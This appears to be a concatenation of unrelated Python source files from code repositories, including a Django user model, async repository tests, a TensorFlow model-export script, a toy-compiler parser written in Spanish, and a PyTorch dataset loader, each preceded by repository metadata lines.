'sacremoses',
'rank_bm25',
'pytest'
],
cmdclass={
'develop': PostDevelopCommand,
'install': PostInstallCommand,
},
zip_safe=False
)
| 1.796875 | 2 |
order/models/person.py | annaos/scc-storage-order | 0 | 12761043 | <filename>order/models/person.py<gh_stars>0
from django.contrib.auth.models import AbstractUser
from django.db import models
class Person(AbstractUser):
institute = models.CharField(max_length=100, null=True, blank=True)
orders = models.ManyToManyField(
'order.Order',
through='PersonOrder',
related_name="%(app_label)s_%(class)s_related",
related_query_name="%(app_label)s_%(class)ss",
)
def __str__(self):
return self.first_name + ' ' + self.last_name
| 2.359375 | 2 |
tests/test_repos/test_aiopg_repo.py | francojposa/aiohttp-postgres-CRUD | 5 | 12761044 | <filename>tests/test_repos/test_aiopg_repo.py<gh_stars>1-10
from typing import Optional, List
import pytest
from aiokea.errors import DuplicateResourceError, ResourceNotFoundError
from aiokea.filters import Filter, EQ, NE
from tests.stubs.user.entity import User, stub_users
async def test_get(aiopg_db, aiopg_user_repo):
# Insert a user
new_user = await aiopg_user_repo.create(
User(username="test", email="<EMAIL>")
)
# Assert we can retrieve user by its id
retrieved_user = await aiopg_user_repo.get(id=new_user.id)
assert retrieved_user == new_user
async def test_get_not_found(aiopg_db, aiopg_user_repo):
# Attempt to retrieve user by nonexistent ID
with pytest.raises(ResourceNotFoundError):
_ = await aiopg_user_repo.get(id="xxx")
async def test_where(aiopg_db, aiopg_user_repo):
# Get baseline
stub_count = len(stub_users)
# Get all user by using no filters
results: List[User] = await aiopg_user_repo.where()
assert len(results) == stub_count
# Get all user as disjoint sets by using equal to and not equal to
result_equal_to: List[User] = await aiopg_user_repo.where(
[Filter("username", EQ, "brian")]
)
result_not_equal_to: List[User] = await aiopg_user_repo.where(
[Filter("username", NE, "brian")]
)
# Assert the total equals the the sum of the two disjoint sets
assert len(result_equal_to) + len(result_not_equal_to) == stub_count
async def test_first(aiopg_db, aiopg_user_repo):
# Get baseline of all user
users: List[User] = await aiopg_user_repo.where()
# Use convenience method to get first user
first_user: User = await aiopg_user_repo.first()
# Compare first_where user with first where user
assert first_user == users[0]
async def test_first_no_results(aiopg_db, aiopg_user_repo):
# Attempt to retrieve user by nonexistent ID
user: Optional[User] = await aiopg_user_repo.first(
filters=[Filter("id", EQ, "xxx")]
)
# Assert None was returned
assert user is None
async def test_insert(aiopg_db, aiopg_user_repo):
# Get baseline
old_user_count = len(stub_users)
# Insert a user
new_user = User(username="test", email="<EMAIL>")
inserted_user = await aiopg_user_repo.create(new_user)
# Assert that the user took the id we generated within the app
assert inserted_user.id == new_user.id
# Assert we have one more user in the repo
new_user_count = len(await aiopg_user_repo.where())
assert new_user_count == old_user_count + 1
async def test_create_duplicate_error(aiopg_db, aiopg_user_repo):
# Get baseline
old_user_count = len(await aiopg_user_repo.where())
# Create a user
new_user = User(username="test", email="<EMAIL>")
await aiopg_user_repo.create(new_user)
# Attempt to re-create the same user
with pytest.raises(DuplicateResourceError):
await aiopg_user_repo.create(new_user)
# Check that only one user was created
new_user_count = len(await aiopg_user_repo.where())
assert new_user_count == old_user_count + 1
async def test_update(aiopg_db, aiopg_user_repo):
# Get an existing user
roman: User = await aiopg_user_repo.first([Filter("username", EQ, "roman")])
roman.username = "bigassforehead"
# Update the user
await aiopg_user_repo.update(roman)
# Check that the user has been updated
updated_roman: User = await aiopg_user_repo.first([Filter("id", EQ, roman.id)])
assert updated_roman.username == "bigassforehead"
async def test_delete(aiopg_db, aiopg_user_repo):
# Get baseline
old_users: List[User] = await aiopg_user_repo.where()
old_user_count = len(await aiopg_user_repo.where())
# Delete a user
first_old_user = old_users[0]
deleted_user = await aiopg_user_repo.delete(id=first_old_user.id)
# Assert that delete returned the deleted user
assert deleted_user == first_old_user
# Assert the deleted user is not available from the repo
new_users: List[User] = await aiopg_user_repo.where()
assert deleted_user not in new_users
# Assert we have one fewer user in the repo
new_user_count = len(new_users)
assert new_user_count == old_user_count - 1
async def test_delete_not_found(aiopg_db, aiopg_user_repo):
# Attempt to delete user by nonexistent ID
with pytest.raises(ResourceNotFoundError):
_ = await aiopg_user_repo.delete(id="xxx")
| 2.390625 | 2 |
apps/pspnet/tools/export_model.py | c0710204/python-socketio-cluster | 0 | 12761045 | # target: export keras model we used as tensorflow model
import tensorflow as tf
from keras.backend.tensorflow_backend import set_session
import os
import os.path as osp
from keras import backend as K
import tensorflow as tf
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.gpu_options.per_process_gpu_memory_fraction = 0.499
sess = tf.Session(config=config)
set_session(sess)
import sys
sys.path.append('.')
from apps.pspnet.pkg.pspnet import deeplearning as dpl
from apps.pspnet.pkg.pspnet.psp_tf.pspnet import PSPNet50
model=PSPNet50(
nb_classes=150,
input_shape=(473, 473),
weights="pspnet50_ade20k",
path="./pspnet/weights")
net_model=model.model
print('input is :', net_model.input.name)
print ('output is:', net_model.output.name)
output_graph_name = 'tensor_model.pb'
output_fld = './tensorflow_model/'
def freeze_session(session, keep_var_names=None, output_names=None, clear_devices=True):
"""
Freezes the state of a session into a prunned computation graph.
Creates a new computation graph where variable nodes are replaced by
constants taking their current value in the session. The new graph will be
prunned so subgraphs that are not neccesary to compute the requested
outputs are removed.
@param session The TensorFlow session to be frozen.
@param keep_var_names A list of variable names that should not be frozen,
or None to freeze all the variables in the graph.
@param output_names Names of the relevant graph outputs.
@param clear_devices Remove the device directives from the graph for better portability.
@return The frozen graph definition.
"""
from tensorflow.python.framework.graph_util import convert_variables_to_constants
graph = session.graph
with graph.as_default():
freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or []))
output_names = output_names or []
output_names += [v.op.name for v in tf.global_variables()]
input_graph_def = graph.as_graph_def()
if clear_devices:
for node in input_graph_def.node:
node.device = ""
frozen_graph = convert_variables_to_constants(session, input_graph_def,
output_names, freeze_var_names)
return frozen_graph
frozen_graph = freeze_session(K.get_session(), output_names=[net_model.output.op.name])
from tensorflow.python.framework import graph_io
graph_io.write_graph(frozen_graph, output_fld, output_graph_name, as_text=False)
print('saved the constant graph (ready for inference) at: ', osp.join(output_fld, output_graph_name)) | 2.78125 | 3 |
napari/_qt/_tests/test_qt_utils.py | mkitti/napari | 1 | 12761046 | <filename>napari/_qt/_tests/test_qt_utils.py
from qtpy.QtCore import QObject, Signal
from ..utils import qt_signals_blocked
class Emitter(QObject):
test_signal = Signal()
def go(self):
self.test_signal.emit()
def test_signal_blocker(qtbot):
"""make sure context manager signal blocker works"""
obj = Emitter()
# make sure signal works
with qtbot.waitSignal(obj.test_signal):
obj.go()
# make sure blocker works
def err():
raise AssertionError('a signal was emitted')
obj.test_signal.connect(err)
with qt_signals_blocked(obj):
obj.go()
qtbot.wait(750)
| 2.1875 | 2 |
anasint.py | Kaysera/LanguageProcessorCompiler | 0 | 12761047 | <reponame>Kaysera/LanguageProcessorCompiler<gh_stars>0
#!/usr/bin/env python
import componentes
import flujo
import string
import sys
import analex
import ASTree as AST
from sys import argv
from sets import ImmutableSet
class Anasint:
def __init__(self, lexico):
self.ast = []
self.tablaSim = {}
self.lexico = lexico
self.avanza()
self.analizaPrograma()
self.componente = None
def avanza(self):
self.componente = self.lexico.Analiza()
def comprueba(self, cat):
if self.componente.cat == cat:
self.avanza()
else:
print "Error: se esperaba " + cat + " en linea " + str(self.lexico.nlinea)
def analizaPrograma(self):
if self.componente.cat == "PR" and self.componente.valor == "PROGRAMA":
self.avanza()
self.comprueba("Identif")
self.comprueba("PtoComa")
self.analizaDeclVar()
self.analizaInstrucciones()
self.comprueba("Punto")
else:
print "Error: SE ESPERABA PR PROGRAMA en linea " + str(self.lexico.nlinea)
while not (self.componente.cat == "EOF"):
self.avanza()
return
def analizaDeclVar(self):
if self.componente.cat == "PR" and self.componente.valor == "VAR":
self.avanza()
listaIDs = self.analizaListaId()
self.comprueba("DosPtos")
tipo = self.analizaTipo()
self.comprueba("PtoComa")
# RESTRICCION SEMANTICA: No puede haber identificadores repetidos
for identif in listaIDs:
if (identif in self.tablaSim):
print "Error: no puede haber identificadores repetidos. ID repetido: " + str(identif)
else:
self.tablaSim[identif] = tipo
self.analizaDeclV()
elif self.componente.cat == "PR" and self.componente.valor =="INICIO" :
pass
else:
print "Error: SE ESPERABA PR VAR O INICIO en linea " + str(self.lexico.nlinea)
while not (self.componente.cat == "PR" and self.componente.valor == "INICIO"):
self.avanza()
return
def analizaDeclV(self):
if self.componente.cat == "Identif":
listaIDs = self.analizaListaId()
self.comprueba("DosPtos")
tipo = self.analizaTipo()
self.comprueba("PtoComa")
# RESTRICCION SEMANTICA: No puede haber identificadores repetidos
for identif in listaIDs:
if (identif in self.tablaSim):
print "Error: no puede haber identificadores repetidos. ID repetido: " + str(identif)
else:
self.tablaSim[identif] = tipo
self.analizaDeclV()
elif self.componente.cat == "PR" and self.componente.valor == "INICIO":
pass
else:
print "Error: SE ESPERABA IDENTIFICADOR O PR INICIO en linea " + str(self.lexico.nlinea)
while not (self.componente.cat == "PR" and self.componente.valor == "INICIO"):
self.avanza()
return
def analizaListaId(self):
if self.componente.cat == "Identif":
identif = self.componente.valor
self.avanza()
restoIds = self.analizaRestoListaId()
restoIds.append(identif)
return (restoIds)
else:
print "Error: SE ESPERABA IDENTIFICADOR en linea " + str(self.lexico.nlinea)
while not (self.componente.cat == "PtoComa"):
self.avanza()
return
def analizaRestoListaId(self):
if self.componente.cat == "Coma":
self.avanza()
restoIDs = self.analizaListaId()
return restoIDs
elif self.componente.cat == "DosPtos":
return []
else:
print "Error: SE ESPERABA COMA O DOS PUNTOS en linea " + str(self.lexico.nlinea)
while not (self.componente.cat == "PtoComa"):
self.avanza()
return
def analizaTipo(self):
if self.componente.cat =="PR"and self.componente.valor in ["ENTERO", "REAL", "BOOLEANO"]:
tipo = self.analizaTipoStd()
return tipo
elif self.componente.cat == "PR" and self.componente.valor == "VECTOR":
self.avanza()
self.comprueba("CorAp")
self.comprueba("Numero")
self.comprueba("CorCi")
if self.componente.cat == "PR" and self.componente.valor == "DE":
self.avanza()
else:
print "Error: SE ESPERABA DE en linea " + str(self.lexico.nlinea)
while not (self.componente.cat == "PtoComa"):
self.avanza()
return
self.analizaTipoStd()
return "VECTOR"
else:
print "Error: SE ESPERABA TIPO O VECTOR en linea " + str(self.lexico.nlinea)
while not (self.componente.cat == "PtoComa"):
self.avanza()
return
def analizaTipoStd(self):
if self.componente.cat =="PR"and self.componente.valor in ["ENTERO", "REAL", "BOOLEANO"]:
tipo = self.componente.valor
self.avanza()
return tipo
else:
print "Error: TIPO INCORRECTO"
while not (self.componente.cat == "PtoComa"):
self.avanza()
return
def analizaInstrucciones(self):
if self.componente.cat == "PR" and self.componente.valor == "INICIO":
self.avanza()
self.ast = self.analizaListaInst()
if self.componente.cat == "PR" and self.componente.valor == "FIN":
self.avanza()
else:
print "Error: SE ESPERABA FIN en linea " + str(self.lexico.nlinea)
while not (self.componente.cat == "Punto"):
self.avanza()
return
else:
print "Error: SE ESPERABA INICIO en linea " + str(self.lexico.nlinea)
while not (self.componente.cat == "Punto"):
self.avanza()
return
def analizaListaInst(self):
if (self.componente.cat =="PR"and self.componente.valor in ["INICIO", "SI", "ESCRIBE", "LEE", "MIENTRAS"]) or self.componente.cat == "Identif":
inst = self.analizaInstruccion()
self.comprueba("PtoComa")
linst = self.analizaListaInst()
return [inst] + linst
elif self.componente.cat == "PR" and self.componente.valor == "FIN":
return []
else:
print "Error: SE ESPERABA PR, Identificador o FIN en linea " + str(self.lexico.nlinea)
while not (self.componente.cat == "PR" and self.componente.valor == "FIN"):
self.avanza()
return
def analizaInstruccion(self):
if self.componente.cat == "PR" and self.componente.valor == "INICIO":
self.avanza()
linst = self.analizaListaInst()
if self.componente.cat == "PR" and self.componente.valor == "FIN":
self.avanza()
return AST.NodoCompuesta(linst, self.lexico.nlinea)
else:
while not ((self.componente.cat == "PR" and self.componente.valor == "SINO") or self.componente.cat == "PtoComa"):
self.avanza()
return
elif self.componente.cat == "Identif":
return self.analizaInstSimple()
elif self.componente.cat =="PR"and self.componente.valor in ["LEE", "ESCRIBE"]:
return self.analizaInstES()
elif self.componente.cat == "PR" and self.componente.valor == "SI":
self.avanza()
expr = self.analizaExpresion()
if self.componente.cat == "PR" and self.componente.valor == "ENTONCES":
self.avanza()
else:
print "Error: SE ESPERABA ENTONCES en linea " + str(self.lexico.nlinea)
while not ((self.componente.cat == "PR" and self.componente.valor == "SINO") or self.componente.cat == "PtoComa"):
self.avanza()
return
instSi = self.analizaInstruccion()
if self.componente.cat == "PR" and self.componente.valor == "SINO":
self.avanza()
else:
print "Error: SE ESPERABA SINO en linea " + str(self.lexico.nlinea)
while not ((self.componente.cat == "PR" and self.componente.valor == "SINO") or self.componente.cat == "PtoComa"):
self.avanza()
return
instSino = self.analizaInstruccion()
return AST.NodoSi(expr, instSi, instSino, self.lexico.nlinea)
elif self.componente.cat == "PR" and self.componente.valor == "MIENTRAS":
self.avanza()
expr = self.analizaExpresion()
if self.componente.cat == "PR" and self.componente.valor == "HACER":
self.avanza()
else:
print "Error: SE ESPERABA HACER en linea " + str(self.lexico.nlinea)
while not ((self.componente.cat == "PR" and self.componente.valor == "SINO") or self.componente.cat == "PtoComa"):
self.avanza()
return
inst = self.analizaInstruccion()
return AST.NodoMientras(expr, inst, self.lexico.nlinea)
else:
print "Error: Instruccion invalida"
while not ((self.componente.cat == "PR" and self.componente.valor == "SINO") or self.componente.cat == "PtoComa"):
self.avanza()
return
def analizaInstSimple(self):
if self.componente.cat == "Identif":
# RESTRICCION SEMANTICA: definir variables antes de usarlas
if (self.componente.valor not in self.tablaSim):
print "Error: variable no definida: '" + self.componente.valor + "' en linea " + str(self.componente.linea)
var = self.componente
self.avanza()
return self.analizaRestoInstSimple(var)
else:
print "Error: SE ESPERABA IDENTIFICADOR en linea " + str(self.lexico.nlinea)
while not ((self.componente.cat == "PR" and self.componente.valor == "SINO") or self.componente.cat == "PtoComa"):
self.avanza()
return
def analizaRestoInstSimple(self, var):
if self.componente.cat == "OpAsigna":
self.avanza()
accVar = AST.NodoAccesoVariable(var.valor, self.lexico.nlinea, self.tablaSim[var.valor])
expr = self.analizaExpresion()
return AST.NodoAsignacion(accVar, expr, self.lexico.nlinea)
elif self.componente.cat == "CorAp":
self.avanza()
exprVect = self.analizaExprSimple()
self.comprueba("CorCi")
self.comprueba("OpAsigna")
expr = self.analizaExpresion()
nodoVect = AST.NodoAccesoVector(var.valor, exprVect, self.lexico.nlinea, self.tablaSim[var.valor])
return AST.NodoAsignacion(nodoVect, expr, self.lexico.nlinea)
elif (self.componente.cat =="PR"and self.componente.valor in ["SINO"]) or self.componente.cat == "PtoComa":
pass
else:
print "Error: SE ESPERABA OPASIGNA O CORAP en linea " + str(self.lexico.nlinea)
while not ((self.componente.cat == "PR" and self.componente.valor == "SINO") or self.componente.cat == "PtoComa"):
self.avanza()
return
def analizaVariable(self):
if self.componente.cat == "Identif":
# RESTRICCION SEMANTICA: definir variables antes de usarlas
if (self.componente.valor not in self.tablaSim):
print "Error: variable no definida: '" + self.componente.valor + "' en linea " + str(self.componente.linea)
var = self.componente.valor
tipo = self.tablaSim[var]
self.avanza()
dcha = self.analizaRestoVar()
if (dcha is None):
return AST.NodoAccesoVariable(var, self.lexico.nlinea, tipo)
else:
return AST.NodoAccesoVector(var, dcha, self.lexico.nlinea)
else:
print "Error: SE ESPERABA IDENTIFICADOR en linea " + str(self.lexico.nlinea)
while not ((self.componente.cat == "PR" and self.componente.valor in ["Y","O", "ENTONCES", "HACER", "SINO"]) or self.componente.cat == "OpRel" or self.componente.cat == "OpAdd" or self.componente.cat == "OpMult" or self.componente.cat == "CorCi" or self.componente.cat == "ParentCi" or self.componente.cat == "PtoComa"):
self.avanza()
return
def analizaRestoVar(self):
if self.componente.cat == "CorAp":
self.avanza()
expr = self.analizaExprSimple()
self.comprueba("CorCi")
return expr
elif (self.componente.cat =="PR"and self.componente.valor in ["Y", "O", "ENTONCES", "HACER", "SINO"]) or self.componente.cat == "OpMult" or self.componente.cat == "OpAdd" or self.componente.cat == "OpRel" or self.componente.cat == "ParentCi" or self.componente.cat == "PtoComa" or self.componente.cat == "CorCi":
return None
else:
print "Error: SE ESPERABA CORAP en linea " + str(self.lexico.nlinea)
while not ((self.componente.cat == "PR" and self.componente.valor in ["Y","O", "ENTERO", "HACER", "SINO"]) or self.componente.cat == "OpRel" or self.componente.cat == "OpAdd" or self.componente.cat == "OpMult" or self.componente.cat == "CorCi" or self.componente.cat == "ParentCi" or self.componente.cat == "PtoComa"):
self.avanza()
return
def analizaInstES(self):
if self.componente.cat == "PR" and self.componente.valor == "LEE":
self.avanza()
self.comprueba("ParentAp")
# RESTRICCION SEMANTICA: el argumento de LEE solo puede ser entero o real
if (self.tablaSim[self.componente.valor] not in ["ENTERO", "REAL"]):
print "Error: el tipo a leer solo puede ser entero o real (instruccion LEE en linea " + str(self.componente.linea) + ")"
var = self.componente.valor
tipo = self.tablaSim[var]
nodoVar = AST.NodoAccesoVariable(var, self.lexico.nlinea, tipo)
nodoLee = AST.NodoLee(nodoVar, self.lexico.nlinea)
self.comprueba("Identif")
self.comprueba("ParentCi")
return nodoLee
elif self.componente.cat == "PR" and self.componente.valor == "ESCRIBE":
self.avanza()
self.comprueba("ParentAp")
expr = self.analizaExprSimple()
self.comprueba("ParentCi")
nodoEscribe = AST.NodoEscribe(expr, self.lexico.nlinea)
return nodoEscribe
else:
print "Error: SE ESPERABA LEE O ESCRIBE en linea " + str(self.lexico.nlinea)
while not ((self.componente.cat == "PR" and self.componente.valor == "SINO") or self.componente.cat == "PtoComa"):
self.avanza()
return
def analizaExpresion(self):
if (self.componente.cat =="PR"and self.componente.valor in ["NO", "CIERTO", "FALSO"]) or self.componente.cat == "Identif" or self.componente.cat == "Numero" or self.componente.cat == "ParentAp" or self.componente.cat == "OpAdd":
izd = self.analizaExprSimple()
dcha = self.analizaExpresionPrima()
if dcha is None:
return izd
else:
nodoComp = AST.NodoComparacion(izd, dcha[0], self.lexico.nlinea, dcha[1])
return nodoComp
else:
print "Error: SE ESPERABA Comienzo de Expresion Simple en linea " + str(self.lexico.nlinea)
while not ((self.componente.cat == "PR" and self.componente.valor in ["ENTONCES","HACER", "SINO"]) or self.componente.cat == "PtoComa"):
self.avanza()
return
def analizaExpresionPrima(self):
if (self.componente.cat =="PR"and self.componente.valor in ["ENTONCES", "HACER", "SINO"]) or self.componente.cat == "ParentCi" or self.componente.cat == "PtoComa" :
return None
elif self.componente.cat == "OpRel":
op = self.componente.valor
self.avanza()
arb = self.analizaExprSimple()
return [arb, op]
else:
print "Error: SE ESPERABA Comienzo de Expresion Simple en linea " + str(self.lexico.nlinea)
while not ((self.componente.cat == "PR" and self.componente.valor in ["ENTONCES","HACER", "SINO"]) or self.componente.cat == "PtoComa"):
self.avanza()
return
def analizaExprSimple(self):
if (self.componente.cat =="PR"and self.componente.valor in ["NO", "CIERTO", "FALSO"]) or self.componente.cat == "ParentAp" or self.componente.cat == "Identif" or self.componente.cat == "Numero":
term = self.analizaTermino()
return self.analizaRestoExprSimple(term)
elif self.componente.cat == "OpAdd":
signo = self.componente.valor
self.analizaSigno()
term = self.analizaTermino()
dcha = self.analizaRestoExprSimple(term)
return AST.NodoAritmetico(None, dcha, self.lexico.nlinea, signo)
else:
print "Error: SE ESPERABA Comienzo de Expresion Simple en linea " + str(self.lexico.nlinea)
while not ((self.componente.cat == "PR" and self.componente.valor in ["ENTONCES", "HACER", "SINO"]) or self.componente.cat == "OpRel" or self.componente.cat == "CorCi" or self.componente.cat == "ParentCi" or self.componente.cat == "PtoComa"):
self.avanza()
return
def analizaRestoExprSimple(self, hered):
if self.componente.cat == "OpAdd":
op = self.componente.valor
self.avanza()
term = self.analizaTermino()
nodoSuma = AST.NodoAritmetico(hered, term, self.lexico.nlinea, op)
return self.analizaRestoExprSimple(nodoSuma)
elif self.componente.cat == "PR" and self.componente.valor == "O":
self.avanza()
term = self.analizaTermino()
nodoCuasiSuma = AST.NodoAritmetico(hered, term, self.lexico.nlinea, "O")
return self.analizaRestoExprSimple(nodoCuasiSuma)
elif (self.componente.cat =="PR"and self.componente.valor in ["ENTONCES", "HACER", "SINO"]) or self.componente.cat == "ParentCi" or self.componente.cat == "CorCi" or self.componente.cat == "OpRel" or self.componente.cat == "PtoComa":
return hered
else:
print "Error: SE ESPERABA Comienzo de Resto Expresion Simple en linea " + str(self.lexico.nlinea)
while not ((self.componente.cat == "PR" and self.componente.valor in ["ENTONCES", "HACER", "SINO"]) or self.componente.cat == "OpRel" or self.componente.cat == "CorCi" or self.componente.cat == "ParentCi" or self.componente.cat == "PtoComa"):
self.avanza()
return
def analizaTermino(self):
if (self.componente.cat =="PR"and self.componente.valor in ["NO", "CIERTO", "FALSO"]) or self.componente.cat == "ParentAp" or self.componente.cat == "Identif" or self.componente.cat == "Numero":
izq = self.analizaFactor()
return self.analizaRestoTerm(izq)
else:
print "Error: SE ESPERABA Termino en linea " + str(self.lexico.nlinea)
while not ((self.componente.cat == "PR" and self.componente.valor in ["O", "ENTONCES", "HACER", "SINO"]) or self.componente.cat == "OpRel" or self.componente.cat == "OpAdd" or self.componente.cat == "CorCi" or self.componente.cat == "ParentCi" or self.componente.cat == "PtoComa"):
self.avanza()
return
def analizaRestoTerm(self, hered):
if self.componente.cat == "OpMult":
op = self.componente.valor
self.avanza()
fact = self.analizaFactor()
nodoMult = AST.NodoAritmetico(hered, fact, self.lexico.nlinea, op)
return self.analizaRestoTerm(nodoMult)
elif self.componente.cat == "PR" and self.componente.valor == "Y":
self.avanza()
fact = self.analizaFactor()
nodoCuasiMult = AST.NodoAritmetico(hered, fact, self.lexico.nlinea, "Y")
return self.analizaRestoTerm(nodoCuasiMult)
elif (self.componente.cat == "PR" and self.componente.valor in ["ENTONCES", "HACER", "SINO", "O"]) or self.componente.cat == "ParentCi" or self.componente.cat == "CorCi" or self.componente.cat == "OpRel" or self.componente.cat == "PtoComa" or self.componente.cat == "OpAdd":
return hered
else:
print "Error: SE ESPERABA Resto de Termino en linea " + str(self.lexico.nlinea)
while not ((self.componente.cat == "PR" and self.componente.valor in ["O", "ENTONCES", "HACER", "SINO"]) or self.componente.cat == "OpRel" or self.componente.cat == "OpAdd" or self.componente.cat == "CorCi" or self.componente.cat == "ParentCi" or self.componente.cat == "PtoComa"):
self.avanza()
return
def analizaFactor(self):
if self.componente.cat == "Identif":
return self.analizaVariable()
elif self.componente.cat == "Numero":
nodo = None
if self.componente.tipo is "ENTERO":
nodo = AST.NodoEntero(self.componente.valor, self.lexico.nlinea)
else:
nodo = AST.NodoReal(self.componente.valor, self.lexico.nlinea)
self.avanza()
return nodo
elif self.componente.cat == "ParentAp":
self.avanza()
nodo = self.analizaExpresion()
self.comprueba("ParentCi")
return nodo
elif self.componente.cat == "PR" and self.componente.valor == "NO":
self.avanza()
fact = self.analizaFactor()
return AST.NodoAritmetico(None, fact, self.lexico.nlinea, "NO")
elif self.componente.cat == "PR" and self.componente.valor == "CIERTO":
self.avanza()
return AST.NodoBooleano("CIERTO", self.lexico.nlinea)
elif self.componente.cat == "PR" and self.componente.valor == "FALSO":
self.avanza()
return AST.NodoBooleano("FALSO", self.lexico.nlinea)
else:
print "Error: SE ESPERABA Factor en linea " + str(self.lexico.nlinea)
while not ((self.componente.cat == "PR" and self.componente.valor in ["Y","O", "ENTONCES", "HACER", "SINO"]) or self.componente.cat == "OpRel" or self.componente.cat == "OpAdd" or self.componente.cat == "OpMult" or self.componente.cat == "CorCi" or self.componente.cat == "ParentCi" or self.componente.cat == "PtoComa"):
self.avanza()
return
def analizaSigno(self):
if self.componente.cat == "OpAdd":
self.avanza()
else:
print "Error: SE ESPERABA Operador Suma o Resta en linea " + str(self.lexico.nlinea)
while not ((self.componente.cat == "PR" and self.componente.valor in ["NO","CIERTO", "FALSO"]) or self.componente.cat == "Identif" or self.componente.cat == "Numero" or self.componente.cat == "ParentAp"):
self.avanza()
return
############################################################################
#
# Funcion: __main__
# Tarea: Programa principal de prueba del analizador sintactico
# Prametros: --
# Devuelve: --
#
############################################################################
if __name__=="__main__":
script, filename=argv
txt=open(filename).read()
print "Este es tu fichero %r" % filename
i=0
fl = flujo.Flujo(txt)
analex=analex.Analex(fl)
anasint = Anasint(analex)
print (anasint.ast)
for nodo in anasint.ast:
if nodo is not None:
print nodo.arbol()
| 2.8125 | 3 |
src/TF_main.py | valevo/thesis | 1 | 12761048 | # -*- coding: utf-8 -*-
from data.reader import wiki_from_pickles, corpus_to_pickle
from data.corpus import Sentences
from stats.stat_functions import compute_freqs, merge_to_joint
from stats.entropy import typicality
from filtering.typicality import setup_filtering, filter_typicality_incremental
from operator import lt, gt
import argparse
def parse_args():
p = argparse.ArgumentParser()
p.add_argument("--lang", type=str)
p.add_argument("--n_tokens", type=int)
p.add_argument("--factor", type=float,
help="The factor to multiply epsilon with; determines"
"the degree of atypicality.")
args = p.parse_args()
return args.lang, args.n_tokens, args.factor
if __name__ == "__main__":
lang, n, factor = parse_args()
big_n = lambda wiki: len([w for a in wiki for s in a for w in s])*.49
setup_m = 100
m = 10
wiki = list(wiki_from_pickles("data/"+lang+"_pkl"))
sents = [s for a in wiki for s in a]
zipf_model, rank_dict, mean_typ, std_typ, auto_typ = setup_filtering(wiki,
big_n(wiki),
n,
setup_m)
mean_corrected = abs(mean_typ - auto_typ)
epsilon_f_plus = mean_corrected + std_typ*factor
epsilon_f_minus = - epsilon_f_plus
print("\nModel and Epsilon established")
print(auto_typ, mean_typ, std_typ)
print(epsilon_f_minus, epsilon_f_plus)
for m_i in range(m):
print("started ", m_i)
filtered = list(filter_typicality_incremental(sents, zipf_model,
rank_dict, auto_typ, n, epsilon_f_minus, lt))
filtered_freqs = compute_freqs(Sentences(filtered))
print("filtered ", m_i, " typicality: ",
typicality(zipf_model, merge_to_joint(rank_dict, filtered_freqs)))
name = "_".join((str(n), str(factor), str(m_i)))
corpus_to_pickle(filtered, "results/" + lang + "/TF", name) | 2.546875 | 3 |
src/adagraph/dataloaders/mnist.py | anshuln/Training-for-the-Future | 1 | 12761049 | import torch
import torch.utils.data as data
from torchvision.datasets.folder import has_file_allowed_extension, is_image_file, IMG_EXTENSIONS, pil_loader, accimage_loader,default_loader
from PIL import Image
import sys
import os
import os.path
import numpy as np
from random import shuffle
REGIONS_DICT={'Alabama': 'South', 'Arizona': 'SW',
'California': 'Pacific',
'Florida': 'South',
'Indiana': 'MW',
'Iowa': 'MW',
'Kansas': 'MW',
'Massachusetts': 'NE',
'Michigan': 'MW',
'Missouri': 'South',
'Montana': 'RM',
'New-York': 'MA',
'North-Carolina': 'South',
'Ohio': 'MW',
'Oklahoma': 'SW',
'Oregon': 'Pacific',
'Pennsylvania': 'MA',
'South-Carolina': 'South',
'South-Dakota': 'MW',
'Texas': 'SW',
'Utah': 'RM',
'Vermont': 'NE',
'Virginia': 'South',
'Washington': 'Pacific',
'Wyoming': 'RM'}
REGIONS_TO_IDX={'RM': 6,'MA': 1,'NE': 2,'South': 3, 'Pacific': 4, 'MW': 0 , 'SW': 5}
IDX_TO_REGIONS={ 6:'RM',1:'MA',2:'NE',3:'South',4: 'Pacific', 0:'MW', 5:'SW'}
def make_dataset(dir, class_to_idx, extensions, domains,start=1934):
images = []
meta = []
dir = os.path.expanduser(dir)
for target in sorted(os.listdir(dir)):
d = os.path.join(dir, target)
if not os.path.isdir(d):
continue
for root, _, fnames in sorted(os.walk(d)):
for fname in sorted(fnames):
if has_file_allowed_extension(fname, extensions):
path = os.path.join(root, fname)
year=int(path.split('/')[-1].split('_')[0])
city=(path.split('/')[-1].split('_')[1])
region=REGIONS_DICT[city]
pivot_year=start+(year-start)//10*10
if (pivot_year, region) in domains:
item = (path, class_to_idx[target])
images.append(item)
meta.append([year,region])
return images, meta
class MNIST(data.Dataset):
def __init__(self, root, transform=None, target_transform=None,domains=[]):
extensions = IMG_EXTENSIONS
loader = default_loader
# classes, class_to_idx = self._find_classes(root)
# samples, self.meta = make_dataset(root, class_to_idx, extensions, domains)
# if len(samples) == 0:
# raise(RuntimeError("Found 0 files in subfolders of: " + root + "\n"
# "Supported extensions are: " + ",".join(extensions)))
self.root = root
X = np.load("{}/X.npy".format(self.root))
Y = np.load("{}/Y.npy".format(self.root))
A = np.load("{}/A.npy".format(self.root))
U = np.load("{}/U.npy".format(self.root))
# print(domains)
U_ = (U*6).astype('d')
indices = []
for d in domains:
# print(d)
indices += [i for i, x in enumerate(U_) if x == d[0]]
# print(len(indices))
self.X = X[indices]
self.Y = Y[indices]
self.U = U[indices]
self.A = A[indices]
self.loader = loader
# self.extensions = extensions
# self.classes = classes
# self.class_to_idx = class_to_idx
# self.samples = samples
# self.transform = transform
# self.target_transform = target_transform
# self.imgs = self.samples
def _find_classes(self, dir):
if sys.version_info >= (3, 5):
# Faster and available in Python 3.5 and above
classes = [d.name for d in os.scandir(dir) if d.is_dir()]
else:
classes = [d for d in os.listdir(dir) if os.path.isdir(os.path.join(dir, d))]
classes.sort()
class_to_idx = {classes[i]: i for i in range(len(classes))}
return classes, class_to_idx
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (sample, target) where target is class_index of the target class.
"""
# path, target = self.samples[index]
sample = self.X[index]
target = self.Y[index]
# print(sample.shape)
# if self.transform is not None:
# sample = self.transform(sample)
# if self.target_transform is not None:
# target = self.target_transform(target)
y,p = self.U[index], self.A[index]
return np.repeat(sample,3,axis=0).astype('f'), int(y*6), target
def get_meta(self):
return np.array(self.meta)
def __len__(self):
return len(self.X)
def __repr__(self):
fmt_str = 'Dataset ' + self.__class__.__name__ + '\n'
fmt_str += ' Number of datapoints: {}\n'.format(self.__len__())
fmt_str += ' Root Location: {}\n'.format(self.root)
